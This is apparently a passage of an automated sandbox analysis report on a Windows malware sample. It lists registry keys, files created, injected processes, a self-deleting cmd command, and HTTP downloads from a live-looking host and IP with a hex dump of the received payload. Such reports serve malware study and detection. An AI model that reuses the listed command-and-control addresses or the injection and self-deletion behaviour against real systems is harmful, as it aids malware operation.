HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005  PackedCatalogItem  %SystemRoot%\system32\rsvpsp.d
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011  PackedCatalogItem  %SystemRoot%\system32\mswsock.
HKLM\System\Setup  SystemSetupInProgress
HKLM\System\WPA\PnP  seed  1374283966
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Environment  TEMP  %USERPROFILE%\Local Settings\Temp  22
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Environment  TMP  %USERPROFILE%\Local Settings\Temp  22
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  CertificateRevocation
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  DisableCachingOfSSLPages
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  EnableHttp1_1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  EnableNegotiate
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  MimeExclusionListForCache  multipart/mixed multipart/x-mixed-replace multipart/x-byteranges
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  SecureProtocols  160
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  User Agent  Mozilla/4.0 (compatible; MSIE 7.0; Win32)
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  WarnOnPost  0x01000000
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings  WarnOnZoneCrossing
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows NT\CurrentVersion\Winlogon  ParseAutoexec  11
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\  ShellState  0x2400000033880000000000000000000000000000010000000d0000000000
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  DontPrettyPath
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  Filter
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  Hidden
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  HideFileExt
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  HideIcons
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  MapNetDrvBtn
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  NoNetCrawling
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  SeparateProcess
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  ShowCompColor
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  ShowInfoTip
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  ShowSuperHidden
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced  WebView
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83ce-7d74-11dc-97e2-806d6172696f}\  Data  0x000000005c005c003f005c0049004400450023004300640052006f006d00
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83ce-7d74-11dc-97e2-806d6172696f}\  Generation
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83cf-7d74-11dc-97e2-806d6172696f}\  Data  0x000000005c005c003f005c00530054004f00520041004700450023005600
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{d14d83cf-7d74-11dc-97e2-806d6172696f}\  Generation
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders  Cache  C:\Documents and Settings\user\Local Settings\Temporary Internet Files
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  AppData  %USERPROFILE%\​Application Data  10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cache  %USERPROFILE%\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cookies  %USERPROFILE%\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Desktop  %USERPROFILE%\​Desktop 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  History  %USERPROFILE%\​Local Settings\​History 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Local Settings  %USERPROFILE%\​Local Settings 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Personal  %USERPROFILE%\​My Documents 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache  Signature  Client UrlCache MMF Ver 5.2 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CacheLimit  163410 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CachePrefix   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CachePrefix  Cookie: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheOptions  11 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePath  %USERPROFILE%\​Local Settings\​History\​History.IE5\​MSHist012008051620080517 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePrefix  :2008051620080517:  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheLimit  1000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePath  %USERPROFILE%\​UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePrefix  UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePath  %USERPROFILE%\​Local Settings\​Application Data\​Microsoft\​Feeds Cache 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePrefix  feedplat: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CachePrefix  Visited: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  AutoDetect 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​     
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  @ivt 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  file 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  ftp 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  http 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  https 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​\​ProtocolDefaults\​  shell 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​0  1806 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​0  Flags  33 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​1  Flags  475 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​2  Flags  71 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​3  1A10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​3  Flags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​Zones\​4  Flags 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​ShellNoRoam\​MUICache  LangID  0x0904 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​ShellNoRoam\​MUICache\​  C:\WINDOWS\system32\cmd.exe  Windows Command Processor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  MigrateProxy 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  ProxyEnable 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  DefaultConnectionSettings  0x3c0000000200000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  SavedLegacySettings  0x460000006700000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  APPDATA  C:\​Documents and Settings\​user\​Application Data  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  CLIENTNAME    22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEDRIVE  C:  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEPATH  \​Documents and Settings\​user  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMESHARE    22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  LOGONSERVER  \​\​USER  22 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  SESSIONNAME  Console  22 

  - Monitored Registry Keys:  
Key Name Watch subtree Notify Filter Count
HKLM\Software\Classes  Key Change,Value Change
HKLM\Software\Classes\CLSID  Key Change,Value Change
HKLM\Software\Microsoft\COM3  Key Change,Value Change
HKLM\Software\Microsoft\Tracing\RASAPI32  Attributes Change,Value Change,Security Descriptor Change
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5  Key Change
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9  Key Change
HKU  Key Change,Value Change

2.b) sample.exe - File Activities

  - Files Created:  
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\pzmwjkoopp[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\uaobttgu[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\yheess[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\fcdzd[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\wfcdqr[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\fivijnnboc[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\vfcggulym[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\ccznrrs[1].txt
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\flvjj[1].htm
c:\bwhqnaix.exe

  - Files Read:  
C:\Documents and Settings\All Users\Documents\desktop.ini
C:\Documents and Settings\user\My Documents\desktop.ini
C:\WINDOWS\Registration\R00000000000f.clb
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\win.ini
C:\sample.exe
PIPE\lsarpc
PIPE\wkssvc
c:\autoexec.bat

  - Files Modified:  
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\pzmwjkoopp[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\uaobttgu[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\yheess[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\fcdzd[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\wfcdqr[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\fivijnnboc[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\vfcggulym[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\ccznrrs[1].txt
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\flvjj[1].htm
MountPointManager
PIPE\lsarpc
PIPE\wkssvc
WMIDataDevice
\Device\Afd\AsyncConnectHlp
\Device\Afd\Endpoint
\Device\RasAcd
c:\bwhqnaix.exe

  - File System Control Communication:  
File Control Code Times
PIPE\lsarpc  0x0011C017  80 
PIPE\wkssvc  0x0011C017 

  - Device Control Communication:  
File Control Code Times
WMIDataDevice  0x0022414C 
WMIDataDevice  0x00228144 
\Device\KsecDD  0x00390008 
\Device\Afd\Endpoint  AFD_GET_INFO (0x0001207B) 
\Device\Afd\Endpoint  AFD_SET_CONTEXT (0x00012047)  72 
\Device\Afd\Endpoint  AFD_BIND (0x00012003) 
\Device\Afd\Endpoint  AFD_GET_TDI_HANDLES (0x00012037)  18 
\Device\Afd\Endpoint  AFD_GET_SOCK_NAME (0x0001202F) 
\Device\Afd\Endpoint  AFD_SET_INFO (0x0001203B)  18 
\Device\Afd\AsyncConnectHlp  AFD_CONNECT (0x00012007) 
\Device\Afd\Endpoint  AFD_SELECT (0x00012024) 
unnamed file  0x00120028  17 
\Device\Afd\Endpoint  AFD_SEND (0x0001201F) 
\Device\Afd\Endpoint  AFD_RECV (0x00012017)  16 
IDE#CdRomQEMU_QEMU_CD-ROM________________________0.9.____#4d51303030302033202020202020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}  0x004D0008 
MountPointManager  0x006D0008 
STORAGE#Volume#1&30a96598&0&Signature95619561Offset7E00Length13F291800#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}  0x004D0008 
MountPointManager  0x006D0034 

  - Memory Mapped Files:  
File Name
C:\WINDOWS\System32\mswsock.dll
C:\WINDOWS\System32\wshtcpip.dll
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
C:\WINDOWS\WindowsShell.Manifest
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\CLBCATQ.DLL
C:\WINDOWS\system32\COMRes.dll
C:\WINDOWS\system32\DCIMAN32.dll
C:\WINDOWS\system32\DDRAW.dll
C:\WINDOWS\system32\DNSAPI.dll
C:\WINDOWS\system32\MSCTF.dll
C:\WINDOWS\system32\RASAPI32.dll
C:\WINDOWS\system32\SETUPAPI.dll
C:\WINDOWS\system32\SHELL32.dll
C:\WINDOWS\system32\TAPI32.dll
C:\WINDOWS\system32\WINMM.dll
C:\WINDOWS\system32\WS2HELP.dll
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\comctl32.dll
C:\WINDOWS\system32\hnetcfg.dll
C:\WINDOWS\system32\rasadhlp.dll
C:\WINDOWS\system32\rasman.dll
C:\WINDOWS\system32\rpcss.dll
C:\WINDOWS\system32\rtutils.dll
C:\WINDOWS\system32\sensapi.dll
C:\WINDOWS\system32\ws2_32.dll
C:\Windows\AppPatch\sysmain.sdb
c:\bwhqnaix.exe

2.c) sample.exe - Windows Service Activities

  - Services Started:  
RASMAN

2.d) sample.exe - Process Activities

  - Processes Created:  
Executable Command Line
c:\bwhqnaix.exe  c:\bwhqnaix.exe
C:\WINDOWS\system32\cmd.exe  "C:\WINDOWS\system32\cmd.exe" /c del C:\sample.exe > nul

  - Remote Threads Created:  
Affected Process
c:\bwhqnaix.exe
C:\WINDOWS\system32\cmd.exe

  - Thread Overview:  
Time Number of threads
After 15 seconds
After 79 seconds
After 97 seconds
After 122 seconds

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\bwhqnaix.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\cmd.exe
Process: c:\bwhqnaix.exe

2.e) sample.exe - Network Activity

  - DNS Queries:  
Name Query Type Query Result Successful Protocol
ccmguyldmn.com  DNS_TYPE_A  195.2.253.240   

  -  HTTP Conversations:  
From ANUBIS:1032 to 195.2.253.240:80 - [ccmguyldmn.com]
Request: GET /progs/ltqrivj/yheess.php?adv=adv512
Response: 200 "OK"
Request: GET /progs/ltqrivj/uaobttgu.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/fcdzd.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/wfcdqr.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/fivijnnboc.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/vfcggulym.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/flvjj.php
Response: 200 "OK"
Request: GET /progs/ltqrivj/ccznrrs
Response: 200 "OK"
Request: GET /progs/ltqrivj/pzmwjkoopp.php?adv=adv512&code1=LNLD&code2=3115&id=1824245000&p=1
Response: 200 "OK"
Request: GET /uniq.php?id=1824245000&p=1
Response: 200 "OK"

  -  Unknown TCP Traffic:  
from ANUBIS:1033 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 209 - Transferred inbound Bytes: 883
Data sent:
Data received:
from ANUBIS:1035 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 207 - Transferred inbound Bytes: 883
Data sent:
Data received:
from ANUBIS:1034 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 206 - Transferred inbound Bytes: 883
Data sent:
Data received:
from ANUBIS:1036 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 210 - Transferred inbound Bytes: 883
Data sent:
Data received:
from ANUBIS:1037 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 211 - Transferred inbound Bytes: 883
Data sent:
Data received:
from ANUBIS:1038 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 206 - Transferred inbound Bytes: 883
Data sent:
Data received:
from ANUBIS:1039 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 204 - Transferred inbound Bytes: 7453
Data sent:
Data received:
Data received:
Data received:
af15 f674 f0fd d1be bfad 7ae1 ffdd aeac    ...t......z.....
63a5 77fd 7c3d fc7c 38fb 152c 7ca0 1462    c.w.|=.|8..,|..b
a0ed ff86 1714 7469 606b 7b2d 8bc7 7520    ......ti`k{-..u 
d4a1 ccfc 28cb ff7f a9f6 c6fd 8bd5 c91c    ....(...........
16f7 2e17 728d f7af 9952 af3f 17f3 2ef1    ....r....R.?....
aeff c3fd a68a f37f 1e00 f0b9 30fd f5fe    ............0...
381d 1ae1 42e1 370f fb14 30a2 7694 15a9    8...B.7...0.v...
f91f e8fe bf30 0df4 95fd a70a bcd8 7f8c    .....0..........
fdbf bf07 dfbb fd08 5f80 3e1f fcad 4baf    ........_.>...K.
018c f7a8 8713 a525 bde1 856d f788 d714    .......%...m....
2c9b 5e6f 0075 a8f7 2516 bebd cfcc c4a2    ,.^o.u..%.......
eff9 ad70 c043 fba8 b7ee b6f1 db93 75bf    ...p.C........u.
d4c0 02a7 e817 8ce3 ff15 ff0b ffbb 0b1b    ................
e774 35fd b1d7 ae71 bfe3 35af 70bf e072    .t5....q..5.p..r
9ad7 c525 f8db b6c0 76a3 5776 5fe7 121c    ...%....v.Wv_...
70bb dbec 9e0b ff2f 5d11 b0ae 52af 3c9f    p....../]...R.<.
7484 dbdb                                  t...
Data received:
    
Data received:
    
from ANUBIS:1041 to 195.2.253.240:80
State: Normal establishment and termination - Transferred outbound Bytes: 262 - Transferred inbound Bytes: 178
Data sent:
    
Data received:
    

  -  TCP Connection Attempts:  
from ANUBIS:1036 to 195.2.253.240:80
from ANUBIS:1037 to 195.2.253.240:80
from ANUBIS:1034 to 195.2.253.240:80
from ANUBIS:1038 to 195.2.253.240:80
from ANUBIS:1041 to 195.2.253.240:80
from ANUBIS:1033 to 195.2.253.240:80
from ANUBIS:1039 to 195.2.253.240:80
from ANUBIS:1035 to 195.2.253.240:80

2.f) sample.exe - Other Activities

  - Mutexes Created:  
CTF.Asm.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003
CTF.Compart.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003
CTF.LBES.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003
CTF.Layouts.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003
CTF.TMD.MutexDefaultS-1-5-21-1229272821-1004336348-527237240-1003
CTF.TimListCache.FMPDefaultS-1-5-21-1229272821-1004336348-527237240-1003MUTEX.DefaultS-1-5-21-1229272821-1004336348-527237240-1003
DDrawDriverObjectListMutex
DDrawWindowListMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesCounterMutex
Local\ZonesLockedCacheCounterMutex
__DDrawCheckExclMode__
__DDrawExclMode__

  - Windows SEH exceptions:  
Description Times
Exception 0x80000003 (STATUS_BREAKPOINT) at 0x40ba5d 

3. services.exe

  - General information about this executable  
Analysis Reason: NtConnectPort(\RPC Control\ntsvcs) was called. 
Filename: services.exe 
MD5: 0e776ed5f7cc9f94299e70461b7b8185 
SHA-1: cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf 
File Size: 108544 Bytes
Command Line: C:\WINDOWS\system32\services.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\WINDOWS\system32\ntdll.dll  0x7C900000  0x000AF000 
C:\WINDOWS\system32\kernel32.dll  0x7C800000  0x000F6000 
C:\WINDOWS\system32\ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\WINDOWS\system32\RPCRT4.dll  0x77E70000  0x00092000 
C:\WINDOWS\system32\Secur32.dll  0x77FE0000  0x00011000 
C:\WINDOWS\system32\msvcrt.dll  0x77C10000  0x00058000 
C:\WINDOWS\system32\NCObjAPI.DLL  0x5F770000  0x0000C000 
C:\WINDOWS\system32\MSVCP60.dll  0x76080000  0x00065000 
C:\WINDOWS\system32\SCESRV.dll  0x7DBD0000  0x00051000 
C:\WINDOWS\system32\AUTHZ.dll  0x776C0000  0x00012000 
C:\WINDOWS\system32\USER32.dll  0x7E410000  0x00091000 
C:\WINDOWS\system32\GDI32.dll  0x77F10000  0x00049000 
C:\WINDOWS\system32\USERENV.dll  0x769C0000  0x000B4000 
C:\WINDOWS\system32\umpnpmgr.dll  0x7DBA0000  0x00021000 
C:\WINDOWS\system32\WINSTA.dll  0x76360000  0x00010000 
C:\WINDOWS\system32\NETAPI32.dll  0x5B860000  0x00055000 
C:\WINDOWS\system32\ShimEng.dll  0x5CB70000  0x00026000 
C:\WINDOWS\AppPatch\AcAdProc.dll  0x47260000  0x0000F000 
C:\WINDOWS\system32\IMM32.DLL  0x76390000  0x0001D000 
C:\WINDOWS\system32\Apphelp.dll  0x77B40000  0x00022000 
C:\WINDOWS\system32\VERSION.dll  0x77C00000  0x00008000 
C:\WINDOWS\system32\eventlog.dll  0x77B70000  0x00011000 
C:\WINDOWS\system32\PSAPI.DLL  0x76BF0000  0x0000B000 
C:\WINDOWS\system32\WS2_32.dll  0x71AB0000  0x00017000 
